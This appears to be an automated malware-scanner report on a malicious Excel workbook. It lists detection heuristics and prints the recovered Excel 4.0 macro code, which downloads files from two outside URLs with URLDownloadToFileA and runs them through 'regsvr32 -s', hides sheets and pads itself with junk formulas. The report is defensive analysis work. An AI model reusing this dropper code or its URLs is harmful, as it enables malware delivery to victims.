MALICIOUS
222
Risk Score
Heuristics 6
-
Reference to URLDownloadToFile API critical SC_STR_URLDOWNLOADReference to URLDownloadToFile API
-
Excel 4.0 Auto_Open defined name critical OLE_XLM_AUTOOPEN_DEFINEDNAMEoletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
-
XLM Auto_Open with dangerous formula APIs critical OLE_XLM_DANGEROUS_FNExcel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
-
Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPENWorkbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
-
Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL https://nws.visionconsulting.ro/N1G1KCXA/dot.html In document text (OLE body)
- https://royalpalm.sparkblue.lk/vCNhYrq3Yg8/dot.htmlIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
xlm_macros.txt |
xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 17715 bytes |
SHA-256: eb1a85b2bbf754c5f5dae60baa52abbc4b128717013d604cd0057230ddf0f92c |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 2 shell/COM execution token(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
' 0085 12 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - Doc
' 0085 12 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, very hidden - Doc
' 0085 12 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, very hidden - Doc
' 0085 12 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, very hidden - Doc
' 0018 32 LABEL : Cell Value, String Constant - _xlfn.AGGREGATE hidden len=2 ptgErr *INCOMPLETE FORMULA PARSING* Remaining, unparsed expression: b'\x1d'
' 0018 31 LABEL : Cell Value, String Constant - _xlfn.F.INV.RT hidden len=2 ptgErr *INCOMPLETE FORMULA PARSING* Remaining, unparsed expression: b'\x1d'
' 0018 23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d Doc!CA7
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' Sheet,Reference,Formula,Value
' Doc,CJ29,"",0.00000000000000000000
' Doc,CO41,"LEFT("LdecvsbgvrsxLxrgxg",1)",""
' Doc,BW10,"CALL("URLMon","URLDownloadToFileA","JJCCBB",0,"https://nws.visionconsulting.ro/N1G1KCXA/dot.html","..\iroto.dll",0,0)",""
' Doc,BW11,"CALL("URLMon","URLDownloadToFileA","JJCCBB",0,"https://royalpalm.sparkblue.lk/vCNhYrq3Yg8/dot.html","..\iroto1.dll",0,0)",""
' Doc,BW14,EXEC("regsvr32 -s "&"..\iroto.dll"),""
' Doc,BW15,EXEC("regsvr32 -s "&"..\iroto1.dll"),""
' Doc,BW19,HALT(),""
' Doc,CD15,"ABS(87452634867213107329589011813285672510464283272130242348751686885912109163959323297595260510582865920.00000000000000000000)=ACOS(78947561234876795599709969853406929702810725797355505844224.00000000000000000000)=ACOSH(8769769797897860545492382096123330822144.00000000000000000000)=ABS(87452634867213107329589011813285672510464283272130242348751686885912109163959323297595260510582865920.00000000000000000000)=ACOS(78947561234876795599709969853406929702810725797355505844224.00000000000000000000)=ACOSH(8769769797897860545492382096123330822144.00000000000000000000)=ABS(87452634867213107329589011813285672510464283272130242348751686885912109163959323297595260510582865920.00000000000000000000)=ACOS(78947561234876795599709969853406929702810725797355505844224.00000000000000000000)=ACOSH(8769769797897860545492382096123330822144.00000000000000000000)=ABS(87452634867213107329589011813285672510464283272130242348751686885912109163959323297595260510582865920.00000000000000000000)=ACOS(78947561234876795599709969853406929702810725797355505844224.00000000000000000000)=ACOSH(8769769797897860545492382096123330822144.00000000000000000000)=ABS(87452634867213107329589011813285672510464283272130242348751686885912109163959323297595260510582865920.00000000000000000000)=ACOS(78947561234876795599709969853406929702810725797355505844224.00000000000000000000)=ACOSH(8769769797897860545492382096123330822144.00000000000000000000)=ABS(87452634867213107329589011813285672510464283272130242348751686885912109163959323297595260510582865920.00000000000000000000)=ACOS(78947561234876795599709969853406929702810725797355505844224.00000000000000000000)=ACOSH(8769769797897860545492382096123330822144.00000000000000000000)=ABS(87452634867213107329589011813285672510464283272130242348751686885912109163959323297595260510582865920.00000000000000000000)=ACOS(78947561234876795599709969853406929702810725797355505844224.00000000000000000000)=ACOSH(8769769797897860545492382096123330822144.00000000000000000000)=ABS(87452634867213107329589011813285672510464283272130242348751686885912109163959323297595260510582865920.00000000000000000000)=ACOS(78947561234876795599709969853406929702810725797355505844224.00000000000000000000)=ACOSH(8769769797897860545492382096123330822144.00000000000000000000)=ABS(87452634867213107329589011813285672510464283272130242348751686885912109163959323297595260510582865920.00000000000000000000)=ACOS(78947561234876795599709969853406929702810725797355505844224.00000000000000000000)=ACOSH(8769769797897860545492382096123330822144.00000000000000000000)=ABS(87452634867213107329589011813285672510464283272130242348751686885912109163959323297595260510582865920.00000000000000000000)=ACOS(78947561234876795599709969853406929702810725797355505844224.00000000000000000000)=ACOSH(8769769797897860545492382096123330822144.00000000000000000000)=ABS(87452634867213107329589011813285672510464283272130242348751686885912109163959323297595260510582865920.00000000000000000000)=ACOS(78947561234876795599709969853406929702810725797355505844224.00000000000000000000)=ACOSH(8769769797897860545492382096123330822144.00000000000000000000)=ABS(87452634867213107329589011813285672510464283272130242348751686885912109163959323297595260510582865920.00000000000000000000)=ACOS(78947561234876795599709969853406929702810725797355505844224.00000000000000000000)=ACOSH(8769769797897860545492382096123330822144.00000000000000000000)=ABS(87452634867213107329589011813285672510464283272130242348751686885912109163959323297595260510582865920.00000000000000000000)=ACOS(78947561234876795599709969853406929702810725797355505844224.00000000000000000000)=ACOSH(8769769797897860545492382096123330822144.00000000000000000000)=ABS(87452634867213107329589011813285672510464283272130242348751686885912109163959323297595260510582865920.00000000000000000000)=ACOS(78947561234876795599709969853406929702810725797355505844224.00000000000000000000)=ACOSH(8769769797897860545492382096123330822144.00000000000000000000)=ABS(87452634867213107329589011813285672510464283272130242348751686885912109163959323297595260510582865920.00000000000000000000)=ACOS(78947561234876795599709969853406929702810725797355505844224.00000000000000000000)=ACOSH(8769769797897860545492382096123330822144.00000000000000000000)=ABS(87452634867213107329589011813285672510464283272130242348751686885912109163959323297595260510582865920.00000000000000000000)=ACOS(78947561234876795599709969853406929702810725797355505844224.00000000000000000000)=ACOSH(8769769797897860545492382096123330822144.00000000000000000000)=ABS(87452634867213107329589011813285672510464283272130242348751686885912109163959323297595260510582865920.00000000000000000000)=ACOS(78947561234876795599709969853406929702810725797355505844224.00000000000000000000)=ACOSH(8769769797897860545492382096123330822144.00000000000000000000)=ABS(87452634867213107329589011813285672510464283272130242348751686885912109163959323297595260510582865920.00000000000000000000)=ACOS(78947561234876795599709969853406929702810725797355505844224.00000000000000000000)=ACOSH(8769769797897860545492382096123330822144.00000000000000000000)=ABS(87452634867213107329589011813285672510464283272130242348751686885912109163959323297595260510582865920.00000000000000000000)=ACOS(78947561234876795599709969853406929702810725797355505844224.00000000000000000000)=ACOSH(8769769797897860545492382096123330822144.00000000000000000000)=ABS(87452634867213107329589011813285672510464283272130242348751686885912109163959323297595260510582865920.00000000000000000000)=ACOS(78947561234876795599709969853406929702810725797355505844224.00000000000000000000)=ACOSH(8769769797897860545492382096123330822144.00000000000000000000)=ABS(87452634867213107329589011813285672510464283272130242348751686885912109163959323297595260510582865920.00000000000000000000)=ACOS(78947561234876795599709969853406929702810725797355505844224.00000000000000000000)=ACOSH(8769769797897860545492382096123330822144.00000000000000000000)=ABS(87452634867213107329589011813285672510464283272130242348751686885912109163959323297595260510582865920.00000000000000000000)=ACOS(78947561234876795599709969853406929702810725797355505844224.00000000000000000000)=ACOSH(8769769797897860545492382096123330822144.00000000000000000000)=FORMULA("U"& Doc!BY16& Doc!CL29& Doc!CL30, Doc!BY10)",""
' Doc,CD16,"['FORMULA(\x00Doc!CJ39&\x00Doc!CO28&\x00Doc!BY17&\x00Doc!CJ43&\x00Doc!BY10&\x00Doc!CJ41&\x00Doc!CJ42&\x00Doc!CJ41&\x00Doc!BY11&\x00Doc!CJ41&\x00Doc!CJ42&\x00Doc!CJ41&\x00Doc!BY12&\x00Doc!CJ41&\x00Doc!CJ45&\x00Doc!CJ42&\x00Doc!CJ41&"https://"&\x00Doc!BY13&\x00Doc!CJ41&\x00Doc!CJ42&\x00Doc!CJ41&\x00Doc!CI24&\x00Doc!CJ41&\x00Doc!CJ45&\x00Doc!CJ45&\x00Doc!CJ44,\x00Doc!BW10)', '452354.00000000000000000000=SUMXMY2(45245)']",""
' Doc,CA17,"FORMULA( Doc!CL28, Doc!BY16)",""
' Doc,CD17,"FORMULA( Doc!CJ39& Doc!CO28& Doc!BY17& Doc!CJ43& Doc!BY10& Doc!CJ41& Doc!CJ42& Doc!CJ41& Doc!BY11& Doc!CJ41& Doc!CJ42& Doc!CJ41& Doc!BY12& Doc!CJ41& Doc!CJ45& Doc!CJ42& Doc!CJ41&"https://"& Doc!BY14& Doc!CJ41& Doc!CJ42& Doc!CJ41& Doc!CI25& Doc!CJ41& Doc!CJ45& Doc!CJ45& Doc!CJ44, Doc!BW11)",""
' Doc,CG17,"WORKBOOK.HIDE("Doc2",1)",""
' Doc,CA18,"FORMULA( Doc!CO36, Doc!BY13)",""
' Doc,CD18,GOTO( Doc!BW8),""
' Doc,CG18,"WORKBOOK.HIDE("Doc3",1)",""
' Doc,CA19,"FORMULA("U"& Doc!BY16& Doc!CL32& Doc!CJ31& Doc!CL31& Doc!CL34& Doc!CJ32&"eA", Doc!BY11)",""
' Doc,CG19,"WORKBOOK.HIDE("Doc4",1)",""
' Doc,CA20,"FORMULA( Doc!CO41, Doc!BY17)",""
' Doc,CG20,"ABS(87452634867213107329589011813285672510464283272130242348751686885912109163959323297595260510582865920.00000000000000000000)=ACOS(78947561234876795599709969853406929702810725797355505844224.00000000000000000000)=ACOSH(8769769797897860545492382096123330822144.00000000000000000000)=ABS(87452634867213107329589011813285672510464283272130242348751686885912109163959323297595260510582865920.00000000000000000000)=ACOS(78947561234876795599709969853406929702810725797355505844224.00000000000000000000)=ACOSH(8769769797897860545492382096123330822144.00000000000000000000)=ABS(87452634867213107329589011813285672510464283272130242348751686885912109163959323297595260510582865920.00000000000000000000)=ACOS(78947561234876795599709969853406929702810725797355505844224.00000000000000000000)=ACOSH(8769769797897860545492382096123330822144.00000000000000000000)=ABS(87452634867213107329589011813285672510464283272130242348751686885912109163959323297595260510582865920.00000000000000000000)=ACOS(78947561234876795599709969853406929702810725797355505844224.00000000000000000000)=ACOSH(8769769797897860545492382096123330822144.00000000000000000000)=ABS(87452634867213107329589011813285672510464283272130242348751686885912109163959323297595260510582865920.00000000000000000000)=ACOS(78947561234876795599709969853406929702810725797355505844224.00000000000000000000)=ACOSH(8769769797897860545492382096123330822144.00000000000000000000)=ABS(87452634867213107329589011813285672510464283272130242348751686885912109163959323297595260510582865920.00000000000000000000)=ACOS(78947561234876795599709969853406929702810725797355505844224.00000000000000000000)=ACOSH(8769769797897860545492382096123330822144.00000000000000000000)=ABS(87452634867213107329589011813285672510464283272130242348751686885912109163959323297595260510582865920.00000000000000000000)=ACOS(78947561234876795599709969853406929702810725797355505844224.00000000000000000000)=ACOSH(8769769797897860545492382096123330822144.00000000000000000000)=ABS(87452634867213107329589011813285672510464283272130242348751686885912109163959323297595260510582865920.00000000000000000000)=ACOS(78947561234876795599709969853406929702810725797355505844224.00000000000000000000)=ACOSH(8769769797897860545492382096123330822144.00000000000000000000)=ABS(87452634867213107329589011813285672510464283272130242348751686885912109163959323297595260510582865920.00000000000000000000)=ACOS(78947561234876795599709969853406929702810725797355505844224.00000000000000000000)=ACOSH(8769769797897860545492382096123330822144.00000000000000000000)=ABS(87452634867213107329589011813285672510464283272130242348751686885912109163959323297595260510582865920.00000000000000000000)=ACOS(78947561234876795599709969853406929702810725797355505844224.00000000000000000000)=ACOSH(8769769797897860545492382096123330822144.00000000000000000000)=ABS(87452634867213107329589011813285672510464283272130242348751686885912109163959323297595260510582865920.00000000000000000000)=ACOS(78947561234876795599709969853406929702810725797355505844224.00000000000000000000)=ACOSH(8769769797897860545492382096123330822144.00000000000000000000)=ABS(87452634867213107329589011813285672510464283272130242348751686885912109163959323297595260510582865920.00000000000000000000)=ACOS(78947561234876795599709969853406929702810725797355505844224.00000000000000000000)=ACOSH(8769769797897860545492382096123330822144.00000000000000000000)=ABS(87452634867213107329589011813285672510464283272130242348751686885912109163959323297595260510582865920.00000000000000000000)=ACOS(78947561234876795599709969853406929702810725797355505844224.00000000000000000000)=ACOSH(8769769797897860545492382096123330822144.00000000000000000000)=ABS(87452634867213107329589011813285672510464283272130242348751686885912109163959323297595260510582865920.00000000000000000000)=ACOS(78947561234876795599709969853406929702810725797355505844224.00000000000000000000)=ACOSH(8769769797897860545492382096123330822144.00000000000000000000)=ABS(87452634867213107329589011813285672510464283272130242348751686885912109163959323297595260510582865920.00000000000000000000)=ACOS(78947561234876795599709969853406929702810725797355505844224.00000000000000000000)=ACOSH(8769769797897860545492382096123330822144.00000000000000000000)=ABS(87452634867213107329589011813285672510464283272130242348751686885912109163959323297595260510582865920.00000000000000000000)=ACOS(78947561234876795599709969853406929702810725797355505844224.00000000000000000000)=ACOSH(8769769797897860545492382096123330822144.00000000000000000000)=ABS(87452634867213107329589011813285672510464283272130242348751686885912109163959323297595260510582865920.00000000000000000000)=ACOS(78947561234876795599709969853406929702810725797355505844224.00000000000000000000)=ACOSH(8769769797897860545492382096123330822144.00000000000000000000)=ABS(87452634867213107329589011813285672510464283272130242348751686885912109163959323297595260510582865920.00000000000000000000)=ACOS(78947561234876795599709969853406929702810725797355505844224.00000000000000000000)=ACOSH(8769769797897860545492382096123330822144.00000000000000000000)=ABS(87452634867213107329589011813285672510464283272130242348751686885912109163959323297595260510582865920.00000000000000000000)=ACOS(78947561234876795599709969853406929702810725797355505844224.00000000000000000000)=ACOSH(8769769797897860545492382096123330822144.00000000000000000000)=ABS(87452634867213107329589011813285672510464283272130242348751686885912109163959323297595260510582865920.00000000000000000000)=ACOS(78947561234876795599709969853406929702810725797355505844224.00000000000000000000)=ACOSH(8769769797897860545492382096123330822144.00000000000000000000)=ABS(87452634867213107329589011813285672510464283272130242348751686885912109163959323297595260510582865920.00000000000000000000)=ACOS(78947561234876795599709969853406929702810725797355505844224.00000000000000000000)=ACOSH(8769769797897860545492382096123330822144.00000000000000000000)=ABS(87452634867213107329589011813285672510464283272130242348751686885912109163959323297595260510582865920.00000000000000000000)=ACOS(78947561234876795599709969853406929702810725797355505844224.00000000000000000000)=ACOSH(8769769797897860545492382096123330822144.00000000000000000000)=FORMULA("="& Doc!CG29& Doc!CG36& Doc!CG37& Doc!CG38& Doc!CG34& Doc!CG35& Doc!CG34& Doc!CI24& Doc!CG33, Doc!BW14)",""
' Doc,CA21,"FORMULA( Doc!CO37, Doc!BY14)",""
' Doc,CG21,"FORMULA("="& Doc!CG29& Doc!CG36& Doc!CG37& Doc!CG38& Doc!CG34& Doc!CG35& Doc!CG34& Doc!CI25& Doc!CG33, Doc!BW15)",""
' Doc,CG22,CD12(),""
' Doc,CA25,"FORMULA( Doc!CM28& Doc!CM29& Doc!CM30&"B", Doc!BY12)",""
' Doc,CA26,CG16(),""
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.